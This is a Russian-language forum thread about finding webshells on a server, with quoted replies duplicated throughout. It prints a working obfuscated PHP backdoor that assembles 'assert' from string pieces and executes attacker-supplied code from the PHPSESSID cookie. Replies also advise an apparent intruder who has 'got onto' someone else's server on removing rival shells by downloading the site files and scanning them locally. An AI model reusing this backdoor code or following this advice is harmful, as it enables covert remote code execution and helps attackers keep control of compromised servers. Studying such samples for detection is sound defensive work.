Приветствую, многоуважаемые жители форума, подскажите, пожалуйста, как вычислить все вебшеллы на сервере?
$function = 'a' . 'sse' . 'r' . 't';
if (isset($_COOKIE['PHPSESSID'])) {
$function($_COOKIE['PHPSESSID']);
} else {
echo "";
}
ну как сказать о своем))) а это имеет значение в техническом плане?О каком сервере идет речь? О своем? Если да, то рекомендую imunify360, он детектит (правда не всегда) даже те мини-шеллы которые сам зае#ешься грепать, функции которых через конкатенацию запилены, типа таких:
PHP:$function = 'a' . 'sse' . 'r' . 't'; if (isset($_COOKIE['PHPSESSID'])) { $function($_COOKIE['PHPSESSID']); } else { echo ""; }
желательно, конечно, чтобы можно было выбирать какие шеллы удалять, а какие нетО каком сервере идет речь? О своем? Если да, то рекомендую imunify360, он детектит (правда не всегда) даже те мини-шеллы которые сам зае#ешься грепать, функции которых через конкатенацию запилены, типа таких:
PHP:$function = 'a' . 'sse' . 'r' . 't'; if (isset($_COOKIE['PHPSESSID'])) { $function($_COOKIE['PHPSESSID']); } else { echo ""; }
Ну например тот же imunify360 ты с правами www-root/www-data попросту не поставишь, нужен рут. Если ты залился на какой-то сервер и хочешь выпилить оттуда предполагаемые чужие шеллы, то логичнее выкачать все файлы сайта и прогнать их у себя на локалке вышеупомянутым мною инструментом.ну как сказать о своем))) а это имеет значение в техническом плане?
Да, потому что даже простенький скрипт запустить - он у тебя по таймауту из php.ini закроется раньше, чем отработать успеет, если на сайте более-менее файлов много и запускать его нужно из командной строки.ну как сказать о своем))) а это имеет значение в техническом плане?
спасибо большое!Ну например тот же imunify360 ты с правами www-root/www-data попросту не поставишь, нужен рут. Если ты залился на какой-то сервер и хочешь выпилить оттуда предполагаемые чужие шеллы, то логичнее выкачать все файлы сайта и прогнать их у себя на локалке вышеупомянутым мною инструментом.